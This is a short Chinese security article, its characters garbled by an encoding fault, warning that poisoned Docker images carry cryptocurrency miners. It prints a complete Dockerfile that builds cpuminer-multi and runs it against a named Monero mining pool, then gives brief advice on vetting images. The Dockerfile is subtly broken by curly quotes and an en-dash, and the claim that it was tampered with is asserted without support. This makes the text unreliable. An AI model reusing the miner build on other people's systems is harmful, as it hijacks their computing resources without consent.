Docker作為一種快速部署軟件的工具，正逐漸成為挖礦軟件傳播的途徑之一。

最近，安全研究人員發(fā)現(xiàn)，一些惡意分子通過(guò)篡改Dockerfile腳本，注入挖礦程序，并將其上傳至開源倉(cāng)庫(kù)中。當(dāng)無(wú)數(shù)用戶下載這些鏡像，就會(huì)在自己的服務(wù)器上執(zhí)行挖礦程序，造成了不小的安全隱患。

FROM ubuntu:18.04
RUN apt-get update && \
apt-get install -y software-properties-common && \
add-apt-repository ppa:jonathonf/gcc && \
apt-get -y upgrade && \
apt-get install -y wget && \
wget -nv -O - https://download.docker.com/linux/ubuntu/gpg | apt-key add - && \
echo “deb http://cz.archive.ubuntu.com/ubuntu bionic main universe” | tee –a  /etc/apt/sources.list && \
echo “deb http://cz.archive.ubuntu.com/ubuntu bionic-updates main universe” | tee –a  /etc/apt/sources.list && \
apt-get update && \
apt-get install -y \
build-essential \
git \
wget \
cmake \
libtool \
automake \
autotools-dev \
bsdmainutils \
libboost-system-dev \
libboost-filesystem-dev \
libboost-chrono-dev \
libboost-program-options-dev \
libboost-test-dev \
libboost-thread-dev \
libssl-dev \
libevent-dev \
libminiupnpc-dev \
libzmq5-dev \
libpgm-dev \
libprotobuf-dev \
protobuf-compiler \
libqt5gui5 \
libqt5core5a \
libqt5dbus5 \
qttools5-dev \
qttools5-dev-tools \
libqrencode-dev \
protobuf-compiler \
libqrencode-dev \
git \
apt-utils \
supervisor \
sudo \
curl \
&& apt-get -y clean
RUN useradd -ms /bin/bash miner
USER miner
WORKDIR /home/miner
RUN git clone https://github.com/aeugenegray/cpuminer-multi && \
cd cpuminer-multi && \
./autogen.sh && \
./configure CFLAGS=”-O3″ && \
make 
CMD [“./cpuminer-multi/minerd”,”-a”,”cryptonight”,”-o”,”stratum+tcp://xmr.pool.minergate.com:45560″,”-u”,”user”,”-p”,”password”]

如上所示的容器鏡像，就是被篡改過(guò)的一個(gè)例子。當(dāng)用戶運(yùn)行此鏡像時(shí)，就會(huì)開始運(yùn)行挖礦程序。

為了避免被攻擊，用戶需要注意以下幾點(diǎn)：

• 盡量避免使用未知來(lái)源的Docker鏡像
• 使用gpg校驗(yàn)dockerfile下的公鑰指紋
• 及時(shí)更新Docker鏡像和容器

總之，對(duì)于Docker容器的安全問(wèn)題，開發(fā)者和用戶都需要保持高度的警惕，尤其在大規(guī)模應(yīng)用Docker的場(chǎng)景下，一定要加強(qiáng)Docker容器的安全防護(hù)。